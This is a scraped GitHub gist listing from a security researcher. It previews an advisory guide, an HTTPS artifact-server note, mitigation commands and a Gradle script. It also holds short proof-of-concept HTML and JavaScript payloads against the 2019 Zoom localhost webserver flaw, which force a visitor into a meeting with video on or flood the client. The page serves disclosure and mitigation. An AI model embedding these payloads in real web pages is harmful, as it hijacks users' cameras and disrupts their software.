Skip to content

Instantly share code, notes, and snippets.

Looking at your projects for Security Vulnerabilities.

Jonathan Leitschuh JLLeitschuh

Looking at your projects for Security Vulnerabilities.
Block or report user

Report or block JLLeitschuh

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
JLLeitschuh / How To Use GitHub Security
Last active Sep 17, 2019
An explanation of how to work with GitHub security advisories.
View How To Use GitHub Security

GitHub Security Advisories

If this is your first time using GitHub Security Advisories, please allow me to guide you through how they work.

Advisories are Private

As of September 17th, 2019, when advisories are published, the entire discussion within the advisory will not be made public. Any information you want to provide to the public should be included in the advisory body.

Updating an Advisory

View Artifact Server HTTPS Only

Artifact Server Annoucements

This document captures the links to all of the different artifact server hosts that have announced they will be formally depricating downloading dependencies over HTTP and will only be supporting HTTPS starting in January 2020.


Want to take over the Java ecosystem? All you need is a MITM!

Maven Sonatype

# To prevent the vulnerable server from running on your machine
# (this does not impact Zoom functionality), run these two lines in your Terminal.
pkill "ZoomOpener"; rm -rf ~/.zoomus; touch ~/.zoomus && chmod 000 ~/.zoomus;
pkill "RingCentralOpener"; rm -rf ~/.ringcentralopener; touch ~/.ringcentralopener && chmod 000 ~/.ringcentralopener;
# (You may need to run these lines for each user on your machine.)
# For just your local account
defaults write ~/Library/Preferences/us.zoom.config.plist ZDisableVideo 1
# For all users on the machine
sudo defaults write /Library/Preferences/us.zoom.config.plist ZDisableVideo 1
JLLeitschuh /
Created Jul 8, 2019
Permanently removes the Zoom localhost webserver and prevents it from being reinstalled in the future.
rm -rf ~/.zoomus
touch ~/.zoomus
JLLeitschuh / zoom_poc_iframe.html
Created Jul 8, 2019
Simple POC that launches Zoom on Mac with your video camera activated using an iframe.
View zoom_poc_iframe.html
<iframe src=""/>
JLLeitschuh / zoom_poc_dos.html
Created Jul 7, 2019
Denial of service POC for Zoom
View zoom_poc_dos.html
// It's actually better if this number isn't a valid zoom number.
var attackNumber = "694138052"
var image = document.createElement("img");
// Use a date to bust the browser's cache
var date = new Date();
image.src = "http://localhost:19421/launch?action=join&confno=" + attackNumber + "&" + date.getTime();
JLLeitschuh / zoom_poc_simple.html
Last active Jul 7, 2019
Simplest example of the Zoom exploit
View zoom_poc_simple.html
<img src="http://localhost:19421/launch?action=join&confno=492468757"/>
JLLeitschuh / zoom_simple.txt
Created Jul 7, 2019
Simple example of the Zoom Vunlerability
View zoom_simple.txt
http://localhost:19421/launch?action=join&confno=[some confrence number]
JLLeitschuh / UploadToArtifactory.kt
Created Jun 13, 2019
Gradle Plugin Build logic to upload single files to JFrog Artifactory
View UploadToArtifactory.kt
/* ****************************************************************************** */
// MIT License
// Copyright (c) 2019 Hewlett Packard Enterprise Development LP
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
You can’t perform that action at this time.